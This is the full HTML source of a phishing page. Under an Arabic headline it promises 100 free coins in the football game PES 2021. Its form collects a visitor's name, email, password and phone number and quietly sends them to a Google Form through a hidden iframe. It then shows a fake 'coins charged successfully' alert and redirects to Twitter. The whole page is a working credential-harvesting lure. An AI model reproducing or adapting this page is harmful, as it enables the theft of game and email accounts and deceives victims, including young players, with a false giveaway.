<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>crack</title>
 <link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Amiri:wght@700&family=IBM+Plex+Sans+Arabic&family=Tajawal:wght@700&display=swap" rel="stylesheet">
<style>
    *{
    font-family: 'Amiri', serif;
font-family: 'IBM Plex Sans Arabic', sans-serif;
font-family: 'Tajawal', sans-serif;
}
h1 {
    text-align: center;
    border: 1px solid;
    color: #fff;
    border-bottom-left-radius: 20px;
    border-top-right-radius: 20px;
    background: #9c27b0;
}

a {text-align: center;}
form {
    width: 80%;
    background: #0000000f;
    box-shadow: 0px 0px 20px #000000;
    margin: auto;
    height: 400px;
    text-align: center;
    border-radius: 10px;
    line-height: 80px;
}

form input ,form button{
    margin: 10px;
    width: 80%;
    border: none;
    padding: 8px;
    outline: none;
    border-radius: 10px;
}

body {
    background: url(https://s2.gaming-cdn.com/images/products/7318/orig/efootball-2022-pc-game-steam-cover.jpg) top;
    background-repeat: no-repeat;
    background-size: auto;
}
input[type="submit"] {
    width: 50%;
    background-color: #9c27b0;
    color: #EEe;
}
</style>
</head>
<body>
      <!-- test submit -->
      <script type="text/javascript">var submitted=false;
    </script>
      <iframe name="hidden_iframe" id="hidden_iframe" style="display: none" onload="if(submitted){
          window.location='https://twitter.com';}"></iframe>
  <!-- test submit -->
    <h1 id="h1">عاجل شحن 100 كوينس في  بيس 2021 الآن</h1>
    <form action="https://docs.google.com/forms/u/0/d/e/1FAIpQLSc3bT4PJXOJNlYVZx1xHDHiSmzLl7AEu_nkVWpeNgmOWOYSFg/formResponse" target="hidden_iframe" method="POST" id="mG61Hd" jsmodel="TOfxwf Q91hve CEkLOc" data-shuffle-seed="4912255436055220297" data-response="%.@.[]]" data-first-entry="0" data-last-entry="4" data-is-first-page="true">
        <input type="name" placeholder="name" required name="entry.1950871017" id="N1">
        <input type="Email" placeholder="email" required="Email"  name="entry.1981865388" >
        <input type="password" placeholder="password" required="password"  name="entry.1999329764">
        <input type="number" placeholder="number" required="number" name="entry.982320551" >
        <input type="submit" value="إشحن" onclick="alert(`مرحبا ${window.N1.value} تم الشحن 100 كونس بنجاح `);">
    </form>
<script>
document.title = document.querySelector("#h1").innerHTML;
</script>
</body>
</html>
